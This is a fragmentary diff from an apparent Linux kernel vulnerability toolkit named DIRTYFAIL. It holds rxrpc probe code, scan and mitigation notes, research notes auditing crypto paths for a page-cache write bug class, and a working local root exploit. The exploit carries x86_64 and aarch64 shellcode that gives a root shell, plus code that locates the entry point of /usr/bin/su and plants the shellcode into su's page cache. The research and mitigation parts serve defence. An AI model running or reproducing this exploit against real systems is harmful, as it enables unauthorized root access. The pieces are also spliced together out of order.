DF_EXPLOIT_OK : DF_TEST_ERROR; +} + +df_result_t dirtyfrag_rxrpc_active_probe(void) +{ + char tmpl[] = "/tmp/dirtyfail-rxrpc-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("rxrpc-probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + /* Fault page in. */ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "rxrpc-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("rxrpc-probe inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + /* Look for any byte that differs from the 'A' filler in the first + * 32 bytes (the spliced 8-byte window plus any nearby fallout). 
/*
 * Non-Linux fallbacks (the `#else / * not __linux__ * /` arm of this file).
 *
 * Each stub keeps the same signature as its Linux counterpart, logs a
 * "<function>: Linux-only" message through log_bad(), and returns
 * DF_TEST_ERROR. None of them performs any other work.
 */
df_result_t dirtyfrag_rxrpc_exploit(bool do_shell)
{
    (void)do_shell;   /* unused here; cast silences the unused-parameter warning */
    log_bad("dirtyfrag_rxrpc_exploit: Linux-only");
    return DF_TEST_ERROR;
}
df_result_t dirtyfrag_rxrpc_exploit_inner(void)
{
    log_bad("dirtyfrag_rxrpc_exploit_inner: Linux-only");
    return DF_TEST_ERROR;
}
df_result_t dirtyfrag_rxrpc_active_probe(void)
{
    log_bad("dirtyfrag_rxrpc_active_probe: Linux-only");
    return DF_TEST_ERROR;
}
df_result_t dirtyfrag_rxrpc_active_probe_inner(void)
{
    log_bad("dirtyfrag_rxrpc_active_probe_inner: Linux-only");
    return DF_TEST_ERROR;
}
(Read the script first if you don't trust me — it's ~150 lines of
plain bash with no nested curl-pipe-bash of its own. It is read-only on your system.)
Four options. A–C are listed best-to-worst; D is an optional extra layer that can be combined with any of them:
Undo: `sudo ./dirtyfail --cleanup-mitigate` (or delete the conf
files, then `sudo modprobe <module>` to reload each module as needed).
(`sudo ausearch -k <key>` is the documented tool for this and works on
older distros, but enriched-format compat issues mean `grep` is the
safer default.)
Quick reference card + +``` +SCAN this host: + curl ... | bash # bash check (no compile) + ./dirtyfail --scan # preconds + Copy Fail probe (~1s) + ./dirtyfail --scan --active # all 5 sentinel-STORE probes (~10s) + ./dirtyfail --scan --active --json # same, machine-readable for SIEM + +MITIGATE (Ubuntu / fleet-wide): + sudo ./dirtyfail --mitigate # one-shot defensive deployment + sudo ./dirtyfail --cleanup-mitigate # undo + +MITIGATE (manual, no DIRTYFAIL): + See section 2-C above. + +PATCH: + apt list --upgradable | grep linux-image + dnf check-update kernel + +MONITOR: + /etc/audit/rules.d/99-dirtyfail.rules (see section 3) + +EMERGENCY (suspected compromise via this CVE class): + sudo sysctl vm.drop_caches=3 # evicts page-cache exploits + sudo systemctl restart sshd # forces re-read of /etc/passwd + grep dirtyfail /etc/passwd # check for backdoor user + rm -f /var/tmp/.dirtyfail.state # clean DIRTYFAIL state file +``` + +--- + +## 5. Glossary + +- **Page-cache write**: kernel writes attacker-controlled bytes into the + in-memory copy of a file (`/etc/passwd`, `/usr/bin/su`) without + modifying the file on disk. Persists in RAM until eviction. +- **PAM nullok**: configuration flag that permits authentication for + accounts with an empty password field in `/etc/passwd` (or + `/etc/shadow`). +- **xfrm-ESP**: the kernel's ESP (Encapsulating Security Payload) + implementation in the IPsec stack. The bug class affects in-place + AEAD decrypt over splice-pinned page-cache pages. +- **Userns capability stripping**: kernel-level enforcement that + unprivileged user namespaces have no `CAP_NET_ADMIN` / + `CAP_SYS_ADMIN`, blocking exploit infrastructure even when the + underlying kernel bug is unpatched. 
diff --git a/modules/copy_fail_family/docs/RESEARCH.md b/modules/copy_fail_family/docs/RESEARCH.md new file mode 100644 index 0000000..1b0bb9e --- /dev/null +++ b/modules/copy_fail_family/docs/RESEARCH.md @@ -0,0 +1,324 @@ +# DIRTYFAIL β€” research notes + +This document captures kernel-source audits and analysis adjacent to +the published CVEs (CVE-2026-31431 / CVE-2026-43284 / CVE-2026-43500). +It's a living research log, not a vendor advisory: findings here are +based on reading mainline kernel source and the disclosed write-ups, +and may need re-verification as the kernel evolves. + +--- + +## Β§1. Adjacent kernel paths β€” audit for the same skb_cow_data() bypass pattern + +### TL;DR + +Ten kernel paths beyond the published CVEs were audited for the +same in-place-AEAD-over-splice-pinned-pages bug class. **All ten +are structurally immune.** No undisclosed CVE candidates surfaced +in this audit; the bug class is genuinely tightly scoped to the +three published sinks plus the algif_aead authencesn/rfc4106-gcm +primitives. + +### The vulnerable pattern + +The CVE-2026-43284-class bug requires all four of: + +1. **In-place AEAD** β€” `aead_request_set_crypt(req, src, dst, ...)` + where `src == dst` or the scatterlists alias the same memory. +2. **Conditional skip-COW** β€” input handler has a branch that bypasses + `skb_cow_data()` on certain skb shapes (typically: non-linear with + no frag_list). +3. **`skb_to_sgvec` over skb frags** β€” the scatterlist passed to the + AEAD is built directly from the skb's frags, so splice-pinned page + references end up in it. +4. **Userspace path to the skb's frags** β€” `splice(2)`, `sendfile(2)`, + or `sendmsg(MSG_SPLICE_PAGES)` can deliver attacker-controlled + page-cache pages into those frags. + +Removing any one of the four breaks the chain. 
The published CVEs are +the three sinks where all four conditions align (esp_input, esp6_input, +rxkad_verify_packet_1) plus the algif_aead authencesn / rfc4106-gcm +primitives that share the in-place destination scatterlist pattern. + +### Β§1.1 Path-by-path verdict + +| Path | In-place crypto? | skb_cow_data | Splice-reachable? | Verdict | +|---|---|---|---|---| +| esp_input (esp4) | βœ… | conditional skip | yes | **CVE-2026-43284** (patched) | +| esp6_input | βœ… | conditional skip | yes | **CVE-2026-43284 v6** (patched) | +| algif_aead authencesn | βœ… | n/a (different path) | yes via spliceβ†’AF_ALG | **CVE-2026-31431** (patched) | +| algif_aead rfc4106-gcm | βœ… | n/a | yes | **Copy Fail GCM variant** (patched as side-effect of CF revert) | +| rxkad_verify_packet_1 | βœ… | conditional skip | yes via RxRPC handshake | **CVE-2026-43500** (NOT patched as of 2026-05-09) | +| **ah_input (ah4 + ah6)** | βœ… (HMAC, not decrypt) | **UNCONDITIONAL** | n/a | NOT vulnerable β€” structurally immune | +| **ipcomp_input** | ❌ (decompress, separate output pages) | conditional skip | n/a (output is fresh page) | NOT vulnerable β€” separate dst | +| **macsec_decrypt** | βœ… | **UNCONDITIONAL** | no β€” rx skbs come from netdev | NOT vulnerable β€” structurally immune | +| **tls_sw recv decrypt** | βœ… | unconditional, also rx-only | no β€” rx skbs come from TCP rx ring | NOT vulnerable | +| **tls_sw send encrypt + MSG_SPLICE_PAGES** | YES (read-only on user pages) | n/a (msg_en allocated separately) | yes (msg_pl) but only as src | NOT vulnerable β€” separate src/dst | +| **WireGuard `decrypt_packet`** | βœ… ChaCha20Poly1305 in-place | **UNCONDITIONAL** at line 252 | yes via UDP rx (but COW protects) | NOT vulnerable β€” structurally immune | +| **algif_skcipher `_skcipher_recvmsg`** | βœ… symmetric in-place possible | n/a (different module structure) | src yes (TX SGL), dst no (recv iovec) | NOT vulnerable β€” separate src/dst | +| **espintcp** (ESP-in-TCP) | n/a (delegates) 
| n/a | reaches esp_input via xfrm_rcv_encap | inherits f4c50a4034e6 patch β€” NOT a new CVE | +| **OpenVPN kernel offload `ovpn_aead_decrypt`** | βœ… AEAD in-place | **UNCONDITIONAL** at line 210 | yes via UDP rx (but COW protects) | NOT vulnerable β€” structurally immune | +| **SCTP-AUTH `sctp_auth_calculate_hmac`** | HMAC only (no decrypt, no destination write into skb data frags) | n/a | n/a β€” digest writes to auth chunk header (kernel-allocated), not data frags | NOT vulnerable β€” read-only over data | + +### Β§1.2 Eliminated paths β€” why each is immune + +**`ah_input` (net/ipv4/ah4.c, net/ipv6/ah6.c)** β€” IPsec Authentication +Header. Calls `skb_cow_data(skb, 0, &trailer)` UNCONDITIONALLY before +`skb_to_sgvec_nomark` builds the HMAC scatterlist. No skip-cow branch. +Splice-pinned pages would always be copied into a private buffer +before HMAC verification. + +**`xfrm_ipcomp.c`** β€” IPCOMP decompression has a conditional skip-cow +branch, but the output is allocated as a fresh kernel page +(`alloc_page(GFP_ATOMIC)`) and the destination scatterlist `dsg` is +built separately from the input scatterlist `sg`. Even with +splice-pinned input pages, decompression output goes to fresh pages. +Not in-place over input. + +**`macsec_decrypt` (drivers/net/macsec.c)** β€” MACsec receive AEAD. +Calls `skb_cow_data(skb, 0, &trailer)` unconditionally before +`skb_to_sgvec` and the in-place decrypt. Additionally: macsec rx +skbs come from netdev rx, not from userspace splice β€” the attacker +has no path to plant a page-cache page reference. + +**`tls_sw_recvmsg` (net/tls/tls_sw.c)** β€” kTLS receive AEAD. +kernel.org docs: "To decrypt 'in place' kTLS calls skb_cow_data()." +COW is unconditional on the rx path. 
Additionally: TLS rx skbs come +from the TCP rx queue, not from splice β€” the only way a user can put +a page-cache page reference into a TCP rx skb is via rare +`SO_PEEK_OFF` / `MSG_PEEK` paths or kernel-side socket forwarding, +neither of which gives the attacker control. + +### Β§1.3 kTLS send via MSG_SPLICE_PAGES β€” closest near-miss + +The kTLS *send* path was modified in 2023 ("splice, net: Handle +MSG_SPLICE_PAGES in AF_TLS", LWN 933386) to support +`MSG_SPLICE_PAGES`, which is the same primitive Dirty Frag and Copy +Fail abuse. This was the most plausible adjacent candidate. + +**Resolved: not vulnerable.** Direct reading of `net/tls/tls_sw.c`: + +- `tls_sw_sendmsg_splice()` adds the user's spliced pages to `msg_pl` + (the plaintext sk_msg buffer) via `sk_msg_page_add()`. +- `tls_alloc_encrypted_msg()` calls + `sk_msg_alloc(sk, msg_en, len, 0)` β€” **fresh kernel pages** for the + encrypted buffer. +- `tls_push_record()` chains the scatterlists: + ```c + sg_chain(rec->sg_aead_out, 2, &msg_en->sg.data[i]); + ``` +- `tls_do_encryption()`: + ```c + aead_request_set_crypt(aead_req, rec->sg_aead_in, + rec->sg_aead_out, data_len, rec->iv_data); + ``` +- `sg_aead_in` (chained from msg_pl, contains user's spliced page) + β‰  `sg_aead_out` (chained from msg_en, kernel-allocated pages). + +The encrypt READS the user's spliced /etc/passwd page but WRITES +ciphertext to `msg_en`'s kernel-allocated pages. The user's +page-cache page is never modified. This is exactly the defense the +algif_aead patch (a664bf3d603d) implemented when it reverted to +out-of-place AEAD; kTLS has had it from inception. 
+ +Compare to the vulnerable `esp_input` pattern: + +```c +/* vulnerable: src == dst */ +skb_to_sgvec(skb, sg, ...); +aead_request_set_crypt(req, sg, sg, ...); +``` + +```c +/* safe: src β‰  dst */ +sg_chain(sg_aead_in, ..., msg_pl); /* user spliced pages */ +sg_chain(sg_aead_out, ..., msg_en); /* kernel private pages */ +aead_request_set_crypt(req, sg_aead_in, sg_aead_out, ...); +``` + +### Β§1.3a WireGuard receive β€” `decrypt_packet()` + +ChaCha20Poly1305 in-place AEAD on incoming UDP skbs. Confirmed +**not vulnerable** β€” `drivers/net/wireguard/receive.c:232–277`: + +```c +static bool decrypt_packet(struct sk_buff *skb, struct noise_keypair *keypair) +{ + struct scatterlist sg[MAX_SKB_FRAGS + 8]; + /* ... */ + offset = -skb_network_offset(skb); + skb_push(skb, offset); + num_frags = skb_cow_data(skb, 0, &trailer); /* line 252, UNCONDITIONAL */ + /* ... */ + sg_init_table(sg, num_frags); + if (skb_to_sgvec(skb, sg, 0, skb->len) <= 0) + return false; + if (!chacha20poly1305_decrypt_sg_inplace(sg, skb->len, NULL, 0, + PACKET_CB(skb)->nonce, + keypair->receiving.key)) + return false; +``` + +`skb_cow_data` at line 252 is UNCONDITIONAL β€” no skip-cow branch. By +the time the in-place AEAD runs, any splice-pinned pages have already +been copied into kernel-private pages. Same defensive pattern as +AH, MACsec, kTLS rx. + +### Β§1.3b algif_skcipher β€” `_skcipher_recvmsg()` + +The companion module to algif_aead, exposing symmetric ciphers +(AES-CBC, AES-CTR, etc.) over AF_ALG. Same author and patchset era +as the in-place optimization that introduced Copy Fail (2017, +72548b093ee3); the Copy Fail upstream fix only reverted algif_aead, +so worth verifying algif_skcipher independently. + +`crypto/algif_skcipher.c:151–152`: + +```c +skcipher_request_set_crypt(&areq->cra_u.skcipher_req, areq->tsgl, + areq->first_rsgl.sgl.sgt.sgl, len, ctx->iv); +``` + +- `areq->tsgl` = TX SGL, populated via `af_alg_pull_tsgl()`. 
CAN + contain user-spliced page-cache pages (sendmsg + splice path). +- `areq->first_rsgl.sgl.sgt.sgl` = RX SGL, populated via + `af_alg_get_rsgl(sk, msg, ...)` from the user's `recv()` iovec, + via `iov_iter_get_pages` mapping the calling process's anonymous + memory. + +The cipher operation reads from `tsgl` (potentially user-spliced +page-cache pages) and writes to `rsgl` (user's recv buffer in their +own anonymous memory). **src β‰  dst; output never lands on +splice-pinned page-cache pages.** + +Why this differs from algif_aead's Copy Fail: the algif_aead bug was +specifically about the `authencesn` template internally chaining TAG +pages into the destination SGL extension (`req->dst` extends past +the end of `req->src`'s last page into chained tag pages, which +happen to be the source's spliced pages). Plain skcipher has no AEAD +tags, no chained scratch β€” clean src/dst separation. **Not +vulnerable.** + +### Β§1.3c espintcp β€” IPsec ESP over TCP + +`net/xfrm/espintcp.c` is a *transport-layer wrapper* β€” it does no +cryptographic work itself. The `handle_esp()` function delegates +straight to `xfrm6_rcv_encap` / `xfrm4_rcv_encap`, which call into +the standard `esp_input()` / `esp6_input()` handlers. Any skb that +reaches the ESP path through espintcp is processed by the same code +that was patched by f4c50a4034e6 (SKBFL_SHARED_FRAG check). + +**Verdict: not a separate CVE.** On unpatched kernels, espintcp is +just an alternative transport for the existing CVE-2026-43284 sink +(esp_input). On patched kernels the same fix covers both UDP and TCP +encapsulation. The SHARED_FRAG flag is set wherever splice can plant +pages into TCP send buffers, and the producer-side flagging +propagates through TCP into the espintcp path. + +### Β§1.3d OpenVPN kernel offload β€” `ovpn_aead_decrypt()` + +New module in 6.16+ implementing OpenVPN's data channel +(ChaCha20Poly1305 / AES-GCM) in the kernel. 
1. **Unconditional `skb_cow_data()`** before any in-place crypto —
   AH, MACsec, kTLS rx, WireGuard, OpenVPN offload. (Removes condition 2.)
- **AF_SMC encryption** — uses kTLS/ULP underneath, already covered
  by the kTLS audit (§1.2 / §1.3).
- Linux source (torvalds/master) — `net/ipv4/ah4.c`, `net/ipv6/ah6.c`, `net/xfrm/xfrm_ipcomp.c`, `drivers/net/macsec.c`, `net/tls/tls_sw.c`, `drivers/net/wireguard/receive.c`, `crypto/algif_skcipher.c`, `net/xfrm/espintcp.c`, `drivers/net/ovpn/crypto_aead.c`, `net/sctp/auth.c`
The proper argv matters: NULL argv + * makes the kernel substitute argv[0]="" (printk: "launched '/bin/sh' + * with NULL argv: empty string added"), and bash/sh-as-init-script + * with empty argv[0] doesn't read commands from stdin reliably. + * + * Layout: + * 0x00 xor rdi, rdi ; mov eax, 105 ; syscall β€” setuid(0) [10] + * 0x0a xor rdi, rdi ; mov eax, 106 ; syscall β€” setgid(0) [10] + * 0x14 mov rbx, "/bin/sh\0" ; push rbx β€” pathname on stack [11] + * 0x1f mov r9, rsp β€” r9 = path ptr [3] + * 0x22 xor rax, rax ; push rax ; push r9 β€” argv = [path,NULL][6] + * 0x28 mov rsi, rsp ; mov rdi, r9 β€” argv, pathname [6] + * 0x2e xor rdx, rdx ; mov eax, 0x3b ; syscall β€” envp=NULL, execve [10] + * + * Total: 56 bytes = 14 chained 4-byte writes via cf_4byte_write. */ +__attribute__((unused)) +static const unsigned char shellcode_x86_64[56] = { + /* setuid(0) β€” 10 bytes */ + 0x48,0x31,0xff, + 0xb8,0x69,0x00,0x00,0x00, + 0x0f,0x05, + /* setgid(0) β€” 10 bytes */ + 0x48,0x31,0xff, + 0xb8,0x6a,0x00,0x00,0x00, + 0x0f,0x05, + /* mov rbx, "/bin/sh\0" ; push rbx β€” 11 bytes */ + 0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00, + 0x53, + /* mov r9, rsp β€” 3 bytes */ + 0x49,0x89,0xe1, + /* xor rax, rax ; push rax ; push r9 β€” 6 bytes */ + 0x48,0x31,0xc0, + 0x50, + 0x41,0x51, + /* mov rsi, rsp ; mov rdi, r9 β€” 6 bytes */ + 0x48,0x89,0xe6, + 0x4c,0x89,0xcf, + /* xor rdx, rdx ; mov eax, 0x3b ; syscall β€” 10 bytes */ + 0x48,0x31,0xd2, + 0xb8,0x3b,0x00,0x00,0x00, + 0x0f,0x05, +}; + +/* aarch64 shellcode: same semantics as x86_64 above (setuid(0), + * setgid(0), execve("/bin/sh", ["/bin/sh", NULL], NULL)) encoded for + * the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args, + * `svc #0` to invoke). 20 instructions Γ— 4 bytes = 80 bytes. + * + * STATUS: UNTESTED on hardware. 
The bytes were derived by manually + * cross-referencing each instruction against the ARMv8-A reference + * manual; the matching assembly source ships in + * `tools/exploit_su_aarch64.S` so anyone with `aarch64-linux-gnu-as` + * can regenerate and verify. Runtime is gated behind the env var + * `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1` to prevent accidental use. */ +__attribute__((unused)) +static const unsigned char shellcode_aarch64[80] = { + /* setuid(0) β€” movz x0,#0 ; movz x8,#146 ; svc #0 */ + 0x00,0x00,0x80,0xd2, + 0x48,0x12,0x80,0xd2, + 0x01,0x00,0x00,0xd4, + /* setgid(0) β€” movz x0,#0 ; movz x8,#144 ; svc #0 */ + 0x00,0x00,0x80,0xd2, + 0x08,0x12,0x80,0xd2, + 0x01,0x00,0x00,0xd4, + /* "/bin/sh\0" -> x9 (4Γ— movz/movk lsl) */ + 0xe9,0x45,0x8c,0xd2, /* movz x9, #0x622f */ + 0x29,0xcd,0xad,0xf2, /* movk x9, #0x6e69, lsl 16 */ + 0xe9,0x65,0xce,0xf2, /* movk x9, #0x732f, lsl 32 */ + 0x09,0x0d,0xe0,0xf2, /* movk x9, #0x0068, lsl 48 */ + /* push string : sp -= 16 ; *sp = x9 */ + 0xe9,0x0f,0x1f,0xf8, /* str x9, [sp, #-16]! */ + 0xe9,0x03,0x00,0x91, /* mov x9, sp */ + /* argv = [x9, NULL] on stack */ + 0xff,0x43,0x00,0xd1, /* sub sp, sp, #16 */ + 0xff,0x07,0x00,0xf9, /* str xzr, [sp, #8] */ + 0xe9,0x03,0x00,0xf9, /* str x9, [sp, #0] */ + /* execve(x9, sp, NULL) β€” syscall 221 */ + 0xe0,0x03,0x09,0xaa, /* mov x0, x9 */ + 0xe1,0x03,0x00,0x91, /* mov x1, sp */ + 0xe2,0x03,0x1f,0xaa, /* mov x2, xzr */ + 0xa8,0x1b,0x80,0xd2, /* movz x8, #221 */ + 0x01,0x00,0x00,0xd4, /* svc #0 */ +}; + +/* Build-time arch selection: pick the right shellcode at compile time + * based on the target architecture. SHELLCODE_LEN must be a multiple + * of 4 since cf_4byte_write plants 4 bytes at a time. The unused + * sibling shellcode array is suppressed with __attribute__((unused)) + * up at its definition. 
*/ +#if defined(__x86_64__) || defined(__amd64__) +# define SHELLCODE_BYTES shellcode_x86_64 +# define SHELLCODE_LEN ((int)sizeof(shellcode_x86_64)) +# define SHELLCODE_ARCH "x86_64" +# define SHELLCODE_TESTED 1 +# define SHELLCODE_PRESENT 1 +#elif defined(__aarch64__) +# define SHELLCODE_BYTES shellcode_aarch64 +# define SHELLCODE_LEN ((int)sizeof(shellcode_aarch64)) +# define SHELLCODE_ARCH "aarch64" +# define SHELLCODE_TESTED 0 +# define SHELLCODE_PRESENT 1 +#else +# define SHELLCODE_BYTES shellcode_x86_64 /* placeholder, never used */ +# define SHELLCODE_LEN 0 +# define SHELLCODE_ARCH "unknown" +# define SHELLCODE_TESTED 0 +# define SHELLCODE_PRESENT 0 +#endif + +/* Convenience name kept matching pre-existing usages. */ +#define shellcode SHELLCODE_BYTES + +/* State file: stash original entry-point bytes so we can revert. */ +struct su_state { + char magic[8]; /* "DFSU0001" */ + char target_path[256]; + uint64_t file_offset; + uint64_t original_len; /* always SHELLCODE_LEN, but explicit for forward-compat */ + unsigned char original[SHELLCODE_LEN]; +}; + +/* ---------------------------------------------------------------- * + * ELF parsing β€” find the file offset of the entry point in /usr/bin/su. 
+ * ---------------------------------------------------------------- */ + +static bool resolve_entry_offset(const char *path, off_t *out_offset) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) { + log_bad("open %s: %s", path, strerror(errno)); + return false; + } + + Elf64_Ehdr ehdr; + if (pread(fd, &ehdr, sizeof(ehdr), 0) != sizeof(ehdr)) { + log_bad("read ELF header: %s", strerror(errno)); + close(fd); return false; + } + if (memcmp(ehdr.e_ident, ELFMAG, 4) != 0) { + log_bad("%s is not an ELF file", path); + close(fd); return false; + } + if (ehdr.e_ident[EI_CLASS] != ELFCLASS64) { + log_bad("%s is not 64-bit ELF (this exploit requires x86_64)", path); + close(fd); return false; + } + if (ehdr.e_machine != EM_X86_64) { + log_bad("%s is not x86_64 (machine=0x%x); shellcode is x86_64-only", + path, ehdr.e_machine); + close(fd); return false; + } + + /* Walk program headers to find the LOAD segment containing e_entry. */ + Elf64_Phdr phdr; + bool found = false; + for (int i = 0; i < ehdr.e_phnum; i++) { + off_t poff = ehdr.e_phoff + (off_t)i * ehdr.e_phentsize; + if (pread(fd, &phdr, sizeof(phdr), poff) != sizeof(phdr)) { + log_bad("read phdr[%d]: %s", i, strerror(errno)); + close(fd); return false; + } + if (phdr.p_type != PT_LOAD) continue; + if (!(phdr.p_flags & PF_X)) continue; /* must be executable */ + if (ehdr.e_entry < phdr.p_vaddr) continue; + if (ehdr.e_entry >= phdr.p_vaddr + phdr.p_memsz) continue; + *out_offset = phdr.p_offset + (ehdr.e_entry - phdr.p_vaddr); + found = true; + break; + } + close(fd); + + if (!found) { + log_bad("could not locate executable LOAD segment containing e_entry " + "(0x%llx) in %s", (unsigned long long)ehdr.e_entry, path); + return false; + } + + /* Sanity: ensure the 48-byte plant region fits inside the file. 
*/ + struct stat st; + if (stat(path, &st) < 0) { log_bad("stat: %s", strerror(errno)); return false; } + if ((uint64_t)*out_offset + SHELLCODE_LEN > (uint64_t)st.st_size) { + log_bad("entry offset 0x%llx + %d would overflow %s (size 0x%llx)", + (unsigned long long)*out_offset, SHELLCODE_LEN, + path, (unsigned long long)st.st_size); + return false; + } + return true; +} + +/* ---------------------------------------------------------------- * + * Backup / revert + * ---------------------------------------------------------------- */ + +static bool save_original(const char *path, off_t off) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) { log_bad("open %s: %s", path, strerror(errno)); return false; } + + struct su_state st = {0}; + memcpy(st.magic, STATE_MAGIC, 8); + strncpy(st.target_path, path, sizeof(st.target_path) - 1); + st.file_offset = (uint64_t)off; + st.original_len = SHELLCODE_LEN; + + if (pread(fd, st.original, SHELLCODE_LEN, off) != SHELLCODE_LEN) { + log_bad("pread original 48 bytes: %s", strerror(errno)); + close(fd); return false; + } + close(fd); + + int sfd = open(STATE_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0600); + if (sfd < 0) { log_bad("open %s: %s", STATE_PATH, strerror(errno)); return false; } + if (write(sfd, &st, sizeof(st)) != sizeof(st)) { + log_bad("write state: %s", strerror(errno)); + close(sfd); unlink(STATE_PATH); return false; + } + close(sfd); + log_ok("stashed original %d bytes from %s+0x%llx β†’ %s", + SHELLCODE_LEN, path, (unsigned long long)off, STATE_PATH); + return true; +} + +/* Read state, return false if missing or malformed. 
*/ +static bool load_state(struct su_state *out) +{ + int sfd = open(STATE_PATH, O_RDONLY); + if (sfd < 0) { + log_bad("open %s: %s", STATE_PATH, strerror(errno)); + return false; + } + if (read(sfd, out, sizeof(*out)) != sizeof(*out)) { + log_bad("read state: %s", strerror(errno)); + close(sfd); return false; + } + close(sfd); + if (memcmp(out->magic, STATE_MAGIC, 8) != 0) { + log_bad("state file magic mismatch"); + return false; + } + if (out->original_len != SHELLCODE_LEN) { + log_bad("state file original_len=%llu (expected %d)", + (unsigned long long)out->original_len, SHELLCODE_LEN); + return false; + } + return true; +} + +/* ---------------------------------------------------------------- * + * Plant + verify + * ---------------------------------------------------------------- */ + +static bool plant_shellcode(const char *path, off_t base_off, + const unsigned char *bytes, size_t len) +{ + if (len % 4 != 0) { log_bad("plant len %zu not multiple of 4", len); return false; } + + log_step("planting %zu bytes of shellcode via %zu chained 4-byte writes", + len, len / 4); + + for (size_t i = 0; i < len; i += 4) { + unsigned char chunk[4]; + memcpy(chunk, bytes + i, 4); + if (!cf_4byte_write(path, base_off + (off_t)i, chunk)) { + log_bad("cf_4byte_write[%zu] failed at offset 0x%llx", + i / 4, (unsigned long long)(base_off + i)); + return false; + } + /* Compact progress dot per chunk; no full-line spam. */ + fputc('.', stdout); fflush(stdout); + } + fputc('\n', stdout); + return true; +} + +static bool verify_plant(const char *path, off_t off, + const unsigned char *expected, size_t len) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) { log_bad("verify open: %s", strerror(errno)); return false; } + unsigned char got[SHELLCODE_LEN]; + if (pread(fd, got, len, off) != (ssize_t)len) { + log_bad("verify pread: %s", strerror(errno)); + close(fd); return false; + } + close(fd); + return memcmp(got, expected, len) == 0; +} + +/* try_revert_su_pages: best-effort revert. 
We don't have CAP_SYS_ADMIN + * to drop_caches in init ns from an unprivileged process, but + * POSIX_FADV_DONTNEED on a freshly-opened fd typically evicts the + * affected pages on most kernels. */ +static bool try_revert_su_pages(const char *path, off_t off, + const unsigned char *original, size_t len) +{ + if (!plant_shellcode(path, off, original, len)) { + log_warn("revert plant failed β€” page cache may still be poisoned"); + return false; + } + int fd = open(path, O_RDONLY); + if (fd >= 0) { +#ifdef POSIX_FADV_DONTNEED + posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED); +#endif + close(fd); + } + /* Verify the revert landed correctly. */ + if (!verify_plant(path, off, original, len)) { + log_warn("revert verification failed β€” bytes do not match original"); + return false; + } + return true; +} + +/* ---------------------------------------------------------------- * + * Public entry points + * ---------------------------------------------------------------- */ + +df_result_t exploit_su_shellcode(bool do_shell) +{ + log_step("Copy Fail β€” /usr/bin/su page-cache shellcode injection"); + + const char *target = getenv("DIRTYFAIL_SU_PATH"); + if (!target || !*target) target = SU_PATH; + + /* Architecture preflight. We ship two shellcodes: + * x86_64 β€” tested end-to-end on Fedora 44 (real-root proven). + * aarch64 β€” manually encoded from the ARMv8-A reference, + * never executed on hardware. Gated behind an env + * var so an aarch64 user has to opt in explicitly. + * Anything else has no shellcode and aborts here. */ + if (!SHELLCODE_PRESENT) { + log_bad("no shellcode for this architecture (built for %s); " + "DIRTYFAIL --exploit-su currently supports x86_64 and " + "aarch64 only.", SHELLCODE_ARCH); + return DF_PRECOND_FAIL; + } + if (!SHELLCODE_TESTED && !getenv("DIRTYFAIL_AARCH64_TRUST_UNTESTED")) { + log_bad("running on %s, where the shipped shellcode has NOT been " + "tested on hardware. 
Aborting to avoid bricking /usr/bin/su.", + SHELLCODE_ARCH); + log_hint("if you've reviewed tools/exploit_su_aarch64.S and want to " + "proceed at your own risk, set " + "DIRTYFAIL_AARCH64_TRUST_UNTESTED=1 in the environment."); + log_hint("recommended verification: assemble the .S file with " + "`aarch64-linux-gnu-as` and confirm the byte sequence " + "matches `shellcode_aarch64[]` in src/exploit_su.c."); + return DF_PRECOND_FAIL; + } + if (!SHELLCODE_TESTED) { + log_warn("DIRTYFAIL_AARCH64_TRUST_UNTESTED=1: proceeding with " + "untested aarch64 shellcode (%d bytes). If /usr/bin/su " + "breaks, run `dirtyfail --cleanup-su` (or reboot) to " + "evict the modified page from the cache.", SHELLCODE_LEN); + } + + struct stat st; + if (stat(target, &st) < 0) { + log_bad("stat %s: %s", target, strerror(errno)); + return DF_PRECOND_FAIL; + } + if (!(st.st_mode & S_ISUID) || st.st_uid != 0) { + log_bad("%s is not setuid root (mode=0%o uid=%u)", + target, st.st_mode, st.st_uid); + log_hint("the exploit relies on the setuid bit; without it, the " + "shellcode runs at our existing uid and gains nothing."); + return DF_PRECOND_FAIL; + } + + off_t entry_off; + if (!resolve_entry_offset(target, &entry_off)) return DF_TEST_ERROR; + log_ok("/usr/bin/su entry point at file offset 0x%llx", + (unsigned long long)entry_off); + + log_warn("about to overwrite %d bytes of %s in the page cache", + SHELLCODE_LEN, target); + log_warn("if this fails or the shellcode crashes, /usr/bin/su will be " + "broken system-wide until --cleanup-su or `drop_caches`"); + + /* CRITICAL: disable libc stdin buffering before the typed_confirm + * read. Otherwise fgets() pulls extra bytes from the pipe into libc's + * buffer, which is lost when execve() replaces our process β€” the + * exec'd /bin/sh then sees empty stdin and exits without running + * any commands the user piped in. With _IONBF, fgets does 1-byte + * reads and leaves the kernel pipe intact. 
